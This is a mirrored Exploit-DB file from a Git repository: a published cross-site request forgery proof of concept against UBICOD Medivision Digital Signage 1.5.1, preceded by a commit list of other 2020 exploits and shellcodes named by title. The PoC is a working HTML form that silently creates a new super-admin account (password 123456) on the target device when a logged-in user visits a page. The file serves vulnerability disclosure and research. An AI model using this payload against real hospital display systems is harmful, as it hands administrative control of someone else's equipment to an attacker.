bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/48694.txt
Offensive Security e46d9f65ff DB: 2020-07-27 
32 changes to exploits/shellcodes

Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)
Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)
Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution
UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
Bludit 3.9.2 - Directory Traversal
LibreHealth 2.0.0 - Authenticated Remote Code Execution
Online Course Registration 1.0 - Unauthenticated Remote Code Execution
elaniin CMS - Authentication Bypass
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
Bio Star 2.8.2 - Local File Inclusion
Webtareas 2.1p - Arbitrary File Upload (Authenticated)
F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion
Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)
Socket.io-file 2.0.31 - Arbitrary File Upload
pfSense 2.4.4-p3 - Cross-Site Request Forgery
Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting
Rails 5.0.1 - Remote Code Execution

Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)
Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
2020-07-27 05:02:04 +00:00

62 lines
No EOL
2.2 KiB
Text
Raw Blame History

# Title: UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-07-23
# Author: LiquidWorm
# Product web page: http://www.medivision.co.kr
# CVE: N/A
<!--
UBICOD Medivision Digital Signage 1.5.1 CSRF Add Super Admin
Vendor: UBICOD Co., Ltd. | MEDIVISION INC.
Product web page: http://www.medivision.co.kr
Affected version: Firmware 1.5.1 (2013.01.3)
Summary: Medivision is a service that provides everything from DID operation to
development of DID (Digital Information Display) optimized for hospital environment
and production of professional contents, through DID product installation, image,
video content planning, design work, and remote control. This is a one-stop solution
that solves management at once.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: Apache/2.4.7 (Ubuntu)
PHP/5.5.9-1ubuntu4.22
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5574
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5574.php
19.06.2020
-->
<html>
<body>
<form action="http://10.0.39.2/query/user/itSet" method="POST">
<input type="hidden" name="aa[_id]" value="" />
<input type="hidden" name="aa[uid]" value="testingus2" />
<input type="hidden" name="aa[name]" value="TestN" />
<input type="hidden" name="aa[pass]" value="123456" />
<input type="hidden" name="aa[email]" value="aa2@bb.cc" />
<input type="hidden" name="aa[mobile]" value="111-222-3333" />
<input type="hidden" name="aa[phone]" value="333-222-1111" />
<input type="hidden" name="aa[approval]" value="+" />
<input type="hidden" name="aa[grp]" value="3" />
<input type="hidden" name="od[]" value="name" />
<input type="hidden" name="ip" value="0" />
<input type="hidden" name="np" value="13" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink